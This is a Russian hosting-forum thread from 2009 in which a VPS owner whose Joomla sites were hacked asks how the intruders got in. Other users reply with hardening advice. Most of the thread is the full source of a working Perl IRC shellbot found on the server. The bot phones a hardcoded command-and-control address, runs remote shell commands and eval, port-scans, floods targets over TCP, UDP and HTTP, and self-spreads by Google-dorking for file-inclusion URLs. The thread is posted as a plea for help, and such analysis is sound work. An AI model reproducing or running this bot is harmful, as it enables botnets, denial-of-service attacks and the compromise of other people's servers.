Хакнули (Morgan has hacked you!), помогите определить дырку.? и что надо залатать.

Тема в разделе "Вопросы безопасности", создана пользователем R_D, 13.10.2009.

  1. Offline

    R_D Недавно здесь

    Регистрация:
    12.05.2006
    Сообщения:
    5
    Симпатии:
    0
    Пол:
    Мужской
    Хакнули (Morgan has hacked you!), помогите определить дырку.? и что надо залатать.

    Этот файлик разместили в /tmp

    На vps лежит много сайтов с разными версиями joomla, не могу понять через какой это делают.


    Листинг

    Код (CODE):
    1. #!/usr/bin/perl
    2. # This code is based on atrix (brazil) shellbot, somebody ripped all the credits, but its obviusly a rip.
    3. # so the original author is atrix. the spread perl code was developed by sirhot (i am almost  sure) he is from morocco.
    4. # Note to David Jacoby: Expect a few improvements for the next release.
    5. #
    6. # The following comments are only left in the code to ridiculize this guy.
    7. # --------------------------------------------------------------
    8. # Morgan has hacked you!
    9. # Morgan Argentina, santiago del estero
    10. # http://irc.irc-argentina.org/x.conf
    11. # http://img521.imageshack.us/img521/3779/morganlammer6tu.png
    12. #
    13. # oper morgan {
    14. #        class           clients;
    15. #        from {
    16. #                userhost *@*;
    17. #        };
    18. #        password "soyuncapo";   // morgan si, eres-un-capo.
    19. # oper morgan2 {
    20. #        class           clients;
    21. #        from {
    22. #                userhost *@*;
    23. #        };
    24. #        password "thegod"; //morgan si, eres el-dios.
    25. # -----------------------------------------------------------
    26.  
    27.  
    28. system("kill -9 `ps ax |grep /usr/sbin/apache/log |grep -v grep|awk '{print $1;}'`");
    29.  
    30. my $processo = '/usr/sbin/apache/log';
    31.  
    32.  
    33. my @titi =
    34.  
    35. ("index.php?page=","main.php?page=","index.php?p=","index.php?x=","main.php?p=","index.php?inc=","index.php?frame=","main.php
    36.  
    37. ?x=","index.php?path=","index.php?include=","main.php?path=","index.php?file=","main.php?x=",
    38. "default.php?page=",
    39. "index.php?open=",
    40. "index.php?pagina=",
    41. "index.php?pg=",
    42. "index.php?pag=",
    43. "index.php?content=",
    44. "index.php?cont=",
    45. "index.php?c=",
    46. "index.php?x=",
    47. "index.php?cat=",
    48. "index.php?site=",
    49. "index.php?con=",
    50. "index.php?action=",
    51. "index.php?do=",
    52. "index2.php?x=",
    53. "index2.php?content=",
    54. "template.php?pagina=","index.php?load=");
    55.  
    56. my $goni = $titi[rand scalar @titi];
    57.  
    58. my $linas_max='4';
    59. my $sleep='5';
    60. my @adms=("ice", "hacker", "priv");
    61. my @hostauth=("IceMan.ro","-","ice.users.undernet.org");
    62. my @canais=("#pma");
    63. my $nick='mail';
    64. my $ircname ='mail';
    65. chop (my $realname = `uname -sr`);
    66. $servidor='83.151.29.75' unless $servidor;
    67. my $porta='9999';
    68. my $VERSAO = '0.5';
    69. $SIG{'INT'} = 'IGNORE';
    70. $SIG{'HUP'} = 'IGNORE';
    71. $SIG{'TERM'} = 'IGNORE';
    72. $SIG{'CHLD'} = 'IGNORE';
    73. $SIG{'PS'} = 'IGNORE';
    74. use IO::Socket;
    75. use Socket;
    76. use IO::Select;
    77. chdir("/");
    78. $servidor="$ARGV[0]" if $ARGV[0];
    79. $0="$processo"."\0"x16;;
    80. my $pid=fork;
    81. exit if $pid;
    82. die "Problema com o fork: $!" unless defined($pid);
    83.  
    84. our %irc_servers;
    85. our %DCC;
    86. my $dcc_sel = new IO::Select->new();
    87.  
    88. $sel_cliente = IO::Select->new();
    89. sub sendraw {
    90.   if ($#_ == '1') {
    91.     my $socket = $_[0];
    92.     print $socket "$_[1]\n";
    93.   } else {
    94.       print $IRC_cur_socket "$_[0]\n";
    95.   }
    96. }
    97.  
    98. sub conectar {
    99.    my $meunick = $_[0];
    100.    my $servidor_con = $_[1];
    101.    my $porta_con = $_[2];
    102.  
    103.    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
    104.    if (defined($IRC_socket)) {
    105.      $IRC_cur_socket = $IRC_socket;
    106.  
    107.      $IRC_socket->autoflush(1);
    108.      $sel_cliente->add($IRC_socket);
    109.  
    110.      $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
    111.      $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
    112.      $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
    113.      $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
    114.      nick("$meunick");
    115.      sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
    116.      sleep 1;
    117.    }
    118. }
    119. my $line_temp;
    120. while( 1 ) {
    121.    while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
    122.    delete($irc_servers{''}) if (defined($irc_servers{''}));
    123.    my @ready = $sel_cliente->can_read(0);
    124.    next unless(@ready);
    125.    foreach $fh (@ready) {
    126.      $IRC_cur_socket = $fh;
    127.      $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
    128.      $nread = sysread($fh, $msg, 4096);
    129.      if ($nread == 0) {
    130.         $sel_cliente->remove($fh);
    131.         $fh->close;
    132.         delete($irc_servers{$fh});
    133.      }
    134.      @lines = split (/\n/, $msg);
    135.  
    136.      for(my $c=0; $c<= $#lines; $c++) {
    137.        $line = $lines[$c];
    138.        $line=$line_temp.$line if ($line_temp);
    139.        $line_temp='';
    140.        $line =~ s/\r$//;
    141.        unless ($c == $#lines) {
    142.          parse("$line");
    143.        } else {
    144.            if ($#lines == 0) {
    145.              parse("$line");
    146.            } elsif ($lines[$c] =~ /\r$/) {
    147.                parse("$line");
    148.            } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
    149.                parse("$line");
    150.            } else {
    151.                $line_temp = $line;
    152.            }
    153.        }
    154.       }
    155.    }
    156. }
    157.  
    158. sub parse {
    159.    my $servarg = shift;
    160.    if ($servarg =~ /^PING \:(.*)/) {
    161.      sendraw("PONG :$1");
    162.    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
    163.        my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
    164.        if ($args =~ /^\001VERSION\001$/) {
    165.          notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
    166.        }
    167.        if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
    168.        if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
    169.          if ($onde eq "$meunick"){
    170.            shell("$pn", "$args");
    171.          }
    172.          if ($args =~ /^(\Q$meunick\E|\!say)\s+(.*)/ ) {
    173.             my $natrix = $1;
    174.             my $arg = $2;
    175.             if ($arg =~ /^\!(.*)/) {
    176.               ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
    177.             } elsif ($arg =~ /^\@(.*)/) {
    178.                 $ondep = $onde;
    179.                 $ondep = $pn if $onde eq $meunick;
    180.                 bfunc("$ondep","$1");
    181.             } else {
    182.                 shell("$onde", "$arg");
    183.             }
    184.          }
    185.        }
    186.     }
    187.    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
    188.        if (lc($1) eq lc($meunick)) {
    189.          $meunick=$4;
    190.          $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
    191.        }
    192.    } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
    193.        nick("$meunick|".int rand(999999));
    194.    } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
    195.        $meunick = $2;
    196.        $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
    197.        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
    198.        foreach my $canal (@canais) {
    199.          sendraw("JOIN $canal ddosit");
    200.        }
    201.    }
    202. }
    203.  
    204.  
    205. sub bfunc {
    206.   my $printl = $_[0];
    207.   my $funcarg = $_[1];
    208.   if (my $pid = fork) {
    209.      waitpid($pid, 0);
    210.   } else {
    211.       if (fork) {
    212.          exit;
    213.        } else {
    214.            if ($funcarg =~ /^portscan (.*)/) {
    215.              my $hostip="$1";
    216.              my
    217.  
    218. @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","66
    219.  
    220. 69","7000","8080","8018");
    221.              my (@aberta, %porta_banner);
    222.          sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");    
    223.              foreach my $porta (@portas)  {
    224.                 my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
    225.                 if ($scansock) {
    226.                    push (@aberta, $porta);
    227.                    $scansock->close;
    228.                 }
    229.              }
    230.  
    231.              if (@aberta) {
    232.                sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
    233.              } else {
    234.                sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
    235.              }
    236.            }
    237.            if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
    238.          sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
    239.          my $itime = time;
    240.          my ($cur_time);
    241.              $cur_time = time - $itime;
    242.          while ($3>$cur_time){
    243.              $cur_time = time - $itime;
    244.          &tcpflooder("$1","$2","$3");
    245.              }
    246.          sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
    247.            }
    248.        if ($funcarg =~ /^version/) {
    249.         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO);           
    250.         }
    251.            if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
    252.          sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched mambo for ".$1." seconds.");
    253.          srand;
    254.          my $itime = time;
    255.          my ($cur_time);
    256.          my ($exploited);
    257.          $boturl=$2;
    258.              $cur_time = time - $itime;$exploited = 0;
    259.         while($1>$cur_time){
    260.             $cur_time = time - $itime;
    261.             @urls=fetch();
    262.             foreach $url (@urls) {
    263.             $cur_time = time - $itime;
    264.             my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
    265.  
    266.             $url =$path."/$goni$boturl" ;
    267.  
    268.  
    269.  
    270.  
    271.             $page = http_query($url);
    272.             $exploited = $exploited + 1;
    273.             }
    274.         }
    275.          sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");
    276.            }
    277.            if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
    278.          sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
    279.          my $itime = time;
    280.          my ($cur_time);
    281.              $cur_time = time - $itime;
    282.          while ($2>$cur_time){
    283.              $cur_time = time - $itime;
    284.          my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
    285.              print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
    286.          close($socket);
    287.              }
    288.          sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
    289.            }
    290.            if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
    291.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3."
    292.  
    293. seconds.");
    294.              my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
    295.              $dtime = 1 if $dtime == 0;
    296.              my %bytes;
    297.              $bytes{igmp} = $2 * $pacotes{igmp};
    298.              $bytes{icmp} = $2 * $pacotes{icmp};
    299.              $bytes{o} = $2 * $pacotes{o};
    300.              $bytes{udp} = $2 * $pacotes{udp};
    301.              $bytes{tcp} = $2 * $pacotes{tcp};
    302.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} +
    303.  
    304. $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
    305.            }
    306.            exit;
    307.        }
    308.   }
    309. }
    310.  
    311. sub ircase {
    312.   my ($kem, $printl, $case) = @_;
    313.  
    314.   if ($case =~ /^join (.*)/) {
    315.      j("$1");
    316.    }
    317.  
    318. if ($case =~ /^refresh (.*)/) {
    319. my $goni = $titi[rand scalar @titi];
    320.  }
    321.  
    322.    if ($case =~ /^part (.*)/) {
    323.       p("$1");
    324.    }
    325.    if ($case =~ /^rejoin\s+(.*)/) {
    326.       my $chan = $1;
    327.       if ($chan =~ /^(\d+) (.*)/) {
    328.         for (my $ca = 1; $ca <= $1; $ca++ ) {
    329.           p("$2");
    330.           j("$2");
    331.         }
    332.       } else {
    333.           p("$chan");
    334.           j("$chan");
    335.       }
    336.    }
    337.    if ($case =~ /^op/) {
    338.       op("$printl", "$kem") if $case eq "op";
    339.       my $oarg = substr($case, 3);
    340.       op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
    341.    }
    342.    if ($case =~ /^deop/) {
    343.       deop("$printl", "$kem") if $case eq "deop";
    344.       my $oarg = substr($case, 5);
    345.       deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
    346.    }
    347.    if ($case =~ /^msg\s+(\S+) (.*)/) {
    348.       msg("$1", "$2");
    349.    }
    350.    if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
    351.       for (my $cf = 1; $cf <= $1; $cf++) {
    352.         msg("$2", "$3");
    353.       }
    354.    }
    355.    if ($case =~ /^ctcp\s+(\S+) (.*)/) {
    356.       ctcp("$1", "$2");
    357.    }
    358.    if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
    359.       for (my $cf = 1; $cf <= $1; $cf++) {
    360.         ctcp("$2", "$3");
    361.       }
    362.    }
    363.    if ($case =~ /^nick (.*)/) {
    364.       nick("$1");
    365.    }
    366.    if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
    367.        conectar("$2", "$1", 6667);
    368.    }
    369.    if ($case =~ /^raw (.*)/) {
    370.       sendraw("$1");
    371.    }
    372.    if ($case =~ /^eval (.*)/) {
    373.      eval "$1";
    374.    }
    375. }
    376.  
    377. sub shell {
    378.   my $printl=$_[0];
    379.   my $comando=$_[1];
    380.   if ($comando =~ /cd (.*)/) {
    381.     chdir("$1") || msg("$printl", "No such file or directory");
    382.     return;
    383.   }
    384.   elsif ($pid = fork) {
    385.      waitpid($pid, 0);
    386.   } else {
    387.       if (fork) {
    388.          exit;
    389.        } else {
    390.            my @resp=`$comando 2>&1 3>&1`;
    391.            my $c=0;
    392.            foreach my $linha (@resp) {
    393.              $c++;
    394.              chop $linha;
    395.              sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
    396.              if ($c == "$linas_max") {
    397.                $c=0;
    398.                sleep $sleep;
    399.              }
    400.            }
    401.            exit;
    402.        }
    403.   }
    404. }
    405.  
    406. sub tcpflooder {
    407.  my $itime = time;
    408.  my ($cur_time);
    409.  my ($ia,$pa,$proto,$j,$l,$t);
    410.  $ia=inet_aton($_[0]);
    411.  $pa=sockaddr_in($_[1],$ia);
    412.  $ftime=$_[2];
    413.  $proto=getprotobyname('tcp');
    414.  $j=0;$l=0;
    415.  $cur_time = time - $itime;
    416.  while ($l<1000){
    417.   $cur_time = time - $itime;
    418.   last if $cur_time >= $ftime;
    419.   $t="SOCK$l";
    420.   socket($t,PF_INET,SOCK_STREAM,$proto);
    421.   connect($t,$pa)||$j--;
    422.   $j++;$l++;
    423.  }
    424.  $l=0;
    425.  while ($l<1000){
    426.   $cur_time = time - $itime;
    427.   last if $cur_time >= $ftime;
    428.   $t="SOCK$l";
    429.   shutdown($t,2);
    430.   $l++;
    431.  }
    432. }
    433.  
    434. sub udpflooder {
    435.   my $iaddr = inet_aton($_[0]);
    436.   my $msg = 'A' x $_[1];
    437.   my $ftime = $_[2];
    438.   my $cp = 0;
    439.   my (%pacotes);
    440.   $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
    441.  
    442.   socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
    443.   socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
    444.   socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
    445.   socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
    446.   return(undef) if $cp == 4;
    447.   my $itime = time;
    448.   my ($cur_time);
    449.   while ( 1 ) {
    450.      for (my $porta = 1; $porta <= 65000; $porta++) {
    451.        $cur_time = time - $itime;
    452.        last if $cur_time >= $ftime;
    453.        send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
    454.        send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
    455.        send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
    456.        send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
    457.  
    458.        for (my $pc = 3; $pc <= 255;$pc++) {
    459.          next if $pc == 6;
    460.          $cur_time = time - $itime;
    461.          last if $cur_time >= $ftime;
    462.          socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
    463.          send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
    464.        }
    465.      }
    466.      last if $cur_time >= $ftime;
    467.   }
    468.   return($cur_time, %pacotes);
    469. }
    470.  
    471. sub ctcp {
    472.    return unless $#_ == 1;
    473.    sendraw("PRIVMSG $_[0] :\001$_[1]\001");
    474. }
    475. sub msg {
    476.    return unless $#_ == 1;
    477.    sendraw("PRIVMSG $_[0] :$_[1]");
    478. }  
    479. sub notice {
    480.    return unless $#_ == 1;
    481.    sendraw("NOTICE $_[0] :$_[1]");
    482. }
    483. sub op {
    484.    return unless $#_ == 1;
    485.    sendraw("MODE $_[0] +o $_[1]");
    486. }
    487. sub deop {
    488.    return unless $#_ == 1;
    489.    sendraw("MODE $_[0] -o $_[1]");
    490. }
    491. sub j { &join(@_); }
    492. sub join {
    493.    return unless $#_ == 0;
    494.    sendraw("JOIN $_[0]");
    495. }
    496. sub p { part(@_); }
    497. sub part {
    498.   sendraw("PART $_[0]");
    499. }
    500. sub nick {
    501.   return unless $#_ == 0;
    502.   sendraw("NICK $_[0]");
    503. }
    504. sub quit {
    505.   sendraw("QUIT :$_[0]");
    506. }
    507.  
    508. # Spreader
    509. # this 'spreader' code isnot mine, i dont know who coded it.
    510. # update: well, i just fix0red this shit a bit.
    511. #
    512.  
    513. sub fetch(){
    514.     my $rnd=(int(rand(9999)));
    515.     my $n= 80;
    516.     if ($rnd<5000) { $n<<=1;}
    517.     my $s= (int(rand(5)) * $n);
    518.  
    519. my @dominios = ("com","net","org","info","gov", "gob","gub","xxx",
    520.  
    521. "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
    522.        
    523.  
    524. "py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al",
    525.  
    526. "dk","pl","biz","int","pro","museum","coop",
    527.        
    528.  
    529. "af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba",
    530.  
    531. "bw","bn","bg","bf","bi",
    532.         "vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
    533.        
    534.  
    535. "ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn",
    536.  
    537. "hk","hu","in","id","ir",
    538.        
    539.  
    540. "iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il",
    541.  
    542. "jm","je","jo","kz","ke",
    543.        
    544.  
    545. "ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md",
    546.  
    547. "mc","mn","ms","mz","mm",
    548.        
    549.  
    550. "na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn",
    551.  
    552. "ws","as","sm","pm","vc",      
    553.        
    554.  
    555. "sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr",
    556.  
    557. "tm","tv","ug","ua","uz",
    558.         "vu","vn","ye","yu","cd","zm","zw","");
    559. my @str;
    560.  
    561. foreach $dom  (@dominios)
    562. {
    563.     push (@str,"allinurl:%22".$dom."/".$goni."%22");
    564. }
    565.  
    566.     my $query="www.google.com/search?q=";
    567.     $query.=$str[(rand(scalar(@str)))];
    568.     $query.="&num=$n&start=$s";
    569.  
    570.  
    571.     my @lst=();
    572.     my $page = http_query($query);
    573.     while ($page =~  m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
    574.     if ($1 !~ m/google|cache|translate/){
    575.         push (@lst,$1);
    576.     }
    577.     }
    578.     return (@lst);
    579. }
    580.  
    581.  
    582. sub http_query($){
    583.     my ($url) = @_;
    584.     my $host=$url;
    585.     my $query=$url;
    586.  
    587.     my $page="";
    588.     $host =~ s/href=\"?http:\/\///;
    589.     $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    590.     $query =~s/$host//;
    591.     if ($query eq "") {$query="/";};
    592.     eval {
    593.     local $SIG{ALRM} = sub { die "1";};
    594.     alarm 10;
    595.     my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
    596.     print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
    597.     my @r = <$sock>;
    598.     $page="@r";
    599.     alarm 0;
    600.     close($sock);
    601.     };    
    602.     return $page;
    603.  
    604. }


    Активность следующего характера:

    Код (CODE):
    1. 19:57:34.050096 IP *.*.*.*.40138 > 194.204.30.42.0: UDP, length 15
    2. 19:57:34.050115 IP *.*.*.*.40138 > 194.204.30.42.0: UDP, length 15
    3. 19:57:34.050124 IP *.*.*.*.40138 > 194.204.30.42.0: UDP, length 15
    4. 19:57:34.050133 IP *.*.*.*.40138 > 194.204.30.42.0: UDP, length 15
    5. 19:57:34.050141 IP *.*.*.*.40138 > 194.204.30.42.0: UDP, length 15
     
  2.  
  3. Лат
    Offline

    Лат Звоните 8 (905) 778-52-44

    Регистрация:
    31.01.2007
    Сообщения:
    1 745
    Симпатии:
    113
    Пол:
    Мужской
    эх... Поиском хоть бы воспользовались. Тем масса.

    1) Версия Joomla
    2) Полный список расширений
    3) ЧПУ включено?
     
  4. Offline

    R_D Недавно здесь

    Регистрация:
    12.05.2006
    Сообщения:
    5
    Симпатии:
    0
    Пол:
    Мужской
    На vps лежит много сайтов с разными версиями joomla, не могу понять через какой это делают.
     
  5. Лат
    Offline

    Лат Звоните 8 (905) 778-52-44

    Регистрация:
    31.01.2007
    Сообщения:
    1 745
    Симпатии:
    113
    Пол:
    Мужской
    пиши в аську
     
  6. Offline

    R_D Недавно здесь

    Регистрация:
    12.05.2006
    Сообщения:
    5
    Симпатии:
    0
    Пол:
    Мужской
    написал..
     
  7. Offline

    R_D Недавно здесь

    Регистрация:
    12.05.2006
    Сообщения:
    5
    Симпатии:
    0
    Пол:
    Мужской
    Можно ли в принципе из приведенного листинга понять через какую дырку они действуют?
     
  8. Offline

    _voland_ Местный => Cпециалист <=

    Регистрация:
    12.04.2008
    Сообщения:
    2 171
    Симпатии:
    102
    Пол:
    Мужской
    Нельзя... нужно смотреть все логи сервера изучать компоненты на уязвимости итп..
     
  9. pastushok
    Offline

    pastushok Недавно здесь

    Регистрация:
    22.09.2009
    Сообщения:
    10
    Симпатии:
    2
    Пол:
    Мужской
    поставь на папки : .ftpaccess пропиши в нем
    <Limit ALL>
    Order allow,deny
    Allow from xxx.xxx.xxx.xx (вместо х свой ip адрес)
    Deny from all
    </Limit>

    .ftpaccess данный фаил схожий по принципу .htaccess

    Winscp - программа доступа к серверу через SSH, почитай в инете много есть интересного, сделаешь шифрования пароля , все дыры залатаешь :)
     
  10. Offline

    R_D Недавно здесь

    Регистрация:
    12.05.2006
    Сообщения:
    5
    Симпатии:
    0
    Пол:
    Мужской
    т.е. вы предлагаете засунуть в каждую папку этот файл, что ограничит доступ к ним по ftp (судя по названию) с любого ip кроме моего?
    Как раскидать файл по папкам при наличии огромного их кол-ва?
     
  11. pastushok
    Offline

    pastushok Недавно здесь

    Регистрация:
    22.09.2009
    Сообщения:
    10
    Симпатии:
    2
    Пол:
    Мужской
    да все правильно, будет только с вашего ip вход через ftp , но если нормальный ftp клиент не долго этот фаил раскидать по папкам? тем более там не в каждую папку а корень каждого сайта ну пусть у тебя даже 30 сайтов ну за 10 мин раскидаешь, вообще он действует если поставить в деректорию и перед сайтами, проверял нечайно ip адрес не тот ввел и не мог на свой сервер попасть )) вот .. пришлось влезать через SSH
     
  12. Лат
    Offline

    Лат Звоните 8 (905) 778-52-44

    Регистрация:
    31.01.2007
    Сообщения:
    1 745
    Симпатии:
    113
    Пол:
    Мужской
    Это все конечно хорошо. Но что помешает злоумышленнику эксплуатируя уязвимость расширения залить в корень скрипт файлового менеджера и даже без фтп резвиться как хочешь?

    Топикастеру. Вы возможно мне ссылку кидали. Или аська глючит, пишите не один раз. Или аську киньте в личку.
    Ваши действия просты- обновить все движки, обновить все расширения.
     
  13. pastushok
    Offline

    pastushok Недавно здесь

    Регистрация:
    22.09.2009
    Сообщения:
    10
    Симпатии:
    2
    Пол:
    Мужской
    согласен, фаил .ftpaccess, идет как дополнение к защите, т.к. разумеется также .htaccess изначально у меня настроен так: полностью в админку вход только со своего ip, а другой файл .htaccess в корень сайта
    Перенаправление посетителей при запросе определенных страниц:
    Для любителей поиска скриптов с уязвимостями и дыр в защите
    Добавляем в .htaccess:
    redirect /scripts http://www.microsoft.com
    redirect /_vti_bin http://www.microsoft.com
    redirect /MSADC http://www.microsoft.com
    redirect /_mem_bin http://www.microsoft.com
    redirect /msadc http://www.microsoft.com
    RedirectMatch (.*)\cmd.exe$ http://www.microsoft.com$1

    Любой запрос с адресом /_vti_bin или /scripts будет автоматически перенаправляться на сайт Microsoft.
    далее
    Редирект посетителей в зависимости от реффера (ссылающейся страницы):

    RewriteCond %{HTTP_REFERER} http://www.xakers.ru
    RewriteRule ^/hack.html$ /von.html [L]
    В данном случае все с форума /www.xakers.ru вместо файла hack.html получат файлик von.html

    и полностью согласен что нужно обновление что я и делаю постоянно, т.к. хоть комерческие сайты я не делал, но есть у мну один поклоник,
    который постоянно пытается сломать сайт, а глупее его не хочеться выглядеть и начал свое сайтостроение практически с безопасности.. но вот у меня еще два старых движка на сервере лежат, не хочу обновлять.. т.к. жду его... пусть пытается ломать, а мы будем снова строить и усовершенствоваться в защите... вот...
     
  14. Asylum
    Offline

    Asylum Местный => Cпециалист <=

    Регистрация:
    09.02.2007
    Сообщения:
    2 744
    Симпатии:
    160
    Пол:
    Мужской
    Вы б хоть адрес сказали, ломать могут через что угодно, начиная от дыр у хостера
     

Поделиться этой страницей

Загрузка...